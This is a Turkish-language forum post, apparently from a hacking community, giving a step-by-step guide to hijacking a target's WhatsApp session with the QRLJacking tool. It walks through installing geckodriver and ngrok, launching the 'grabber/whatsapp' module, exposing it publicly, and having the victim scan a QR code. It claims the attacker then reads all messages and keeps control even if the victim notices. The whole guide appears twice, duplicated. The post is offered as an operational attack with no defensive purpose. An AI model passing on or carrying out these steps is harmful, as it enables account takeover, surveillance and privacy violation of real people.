1PythX
S.Moderator
- 27 Ağu 2019
- 2,774
- 2,242
- 113
Masaüstüne geliyoruz.
c/d Desktop
Kullanacağımız tool'u indiriyoruz.
Geckodriver'a ihtiyacımız var.
.zip uzantılı dosyasını çıkartın ve driver'ı gereken dizinlere kopyalayın.
Dizinler:
sudo cp geckodriver/usr/local/share/
sudo cp geckodriver/usr/local/bin/
sudo cp geckodriver/usr/bin/
Şimdi terminali kapatabilirsiniz.
Aracı dış ağda kullanmak için Ngrok'a ihtiyacımız var. Sitesine girip kayıt olup indirin.
Zipten çıkartın ve...
sudo mv ngrok /root
...dizinine atın. Sonra root dizinine giriş yapıp yetki verin.
chmod +x ngrok
Son olarak;
cp ngrok /usr/bin/
Buraya kopyalayıp işlemi bitiriyoruz.
Kayıt olduğunuzda size bir key verdi. O keyi tanıtmak için;
./ngrok authtoken (buraya tokeninizi giriyorsunuz.)
Örn: ./ngrok authtoken 324092349234923457867
Masaüstüne geliyoruz.
cd QRLJacking/
Pyhton modüllerini yüklüyoruz.
pip3 install -r requirements.txt
Pip3 yüklü değil ise şu komudu girin: sudo apt-get install python3-pip
Toolu çalıştırıyoruz.
python3 QrlJacker.py
"help" yazarak komutları görebilirsiniz.
Exploiti çalıştıralım.
use grabber/whatsapp
Options komutunu girerek ayarlara girelim.
Portu ve hostu ayarlayacağız.
set port 1337
set host 0.0.0.0
Not: Firewall kuruluysa "1337" portuna izin verin.
Başka bir terminal açıp portu "Dinleme"ye alıyoruz.
ngrok http 1337
QRLJacker'ın olduğu terminale gelerek;
run
Komudunu verdiğinizde qr kod oluşacak.
Ngrok'u dinlemeye aldığınız terminale gelin ve Forward url'nin karşısındaki url'yi açın.
Kodu hedef telefona okutacaksınız.
Bu kodu okuttuktan sonra Whatsapp kontrolü tamamen sizde olacak. Karşı taraf fark etse bile sizi atamayacak.
Kodu okuttuktan sonra:
sessions -i 0
Kodunu girerek tarayıcıda açılan sekmeyle tüm mesajları görebilir, hedefin Whatsapp'ında her şeyi yapabilirsiniz.
c/d Desktop
Kullanacağımız tool'u indiriyoruz.
Bu bağlantıyı görüntüleme izniniz yok
Giriş yap veya üye ol.
Geckodriver'a ihtiyacımız var.
Bu bağlantıyı görüntüleme izniniz yok
Giriş yap veya üye ol.
gidip, Linux sürümünüze uygun olanı indirin..zip uzantılı dosyasını çıkartın ve driver'ı gereken dizinlere kopyalayın.
Dizinler:
sudo cp geckodriver/usr/local/share/
sudo cp geckodriver/usr/local/bin/
sudo cp geckodriver/usr/bin/
Şimdi terminali kapatabilirsiniz.
Aracı dış ağda kullanmak için Ngrok'a ihtiyacımız var. Sitesine girip kayıt olup indirin.
Bu bağlantıyı görüntüleme izniniz yok
Giriş yap veya üye ol.
Zipten çıkartın ve...
sudo mv ngrok /root
...dizinine atın. Sonra root dizinine giriş yapıp yetki verin.
chmod +x ngrok
Son olarak;
cp ngrok /usr/bin/
Buraya kopyalayıp işlemi bitiriyoruz.
Kayıt olduğunuzda size bir key verdi. O keyi tanıtmak için;
./ngrok authtoken (buraya tokeninizi giriyorsunuz.)
Örn: ./ngrok authtoken 324092349234923457867
Masaüstüne geliyoruz.
cd QRLJacking/
Pyhton modüllerini yüklüyoruz.
pip3 install -r requirements.txt
Pip3 yüklü değil ise şu komudu girin: sudo apt-get install python3-pip
Toolu çalıştırıyoruz.
python3 QrlJacker.py
"help" yazarak komutları görebilirsiniz.
Exploiti çalıştıralım.
use grabber/whatsapp
Options komutunu girerek ayarlara girelim.
Portu ve hostu ayarlayacağız.
set port 1337
set host 0.0.0.0
Not: Firewall kuruluysa "1337" portuna izin verin.
Başka bir terminal açıp portu "Dinleme"ye alıyoruz.
ngrok http 1337
QRLJacker'ın olduğu terminale gelerek;
run
Komudunu verdiğinizde qr kod oluşacak.
Ngrok'u dinlemeye aldığınız terminale gelin ve Forward url'nin karşısındaki url'yi açın.
Kodu hedef telefona okutacaksınız.
Bu kodu okuttuktan sonra Whatsapp kontrolü tamamen sizde olacak. Karşı taraf fark etse bile sizi atamayacak.
Kodu okuttuktan sonra:
sessions -i 0
Kodunu girerek tarayıcıda açılan sekmeyle tüm mesajları görebilir, hedefin Whatsapp'ında her şeyi yapabilirsiniz.
Son düzenleme:
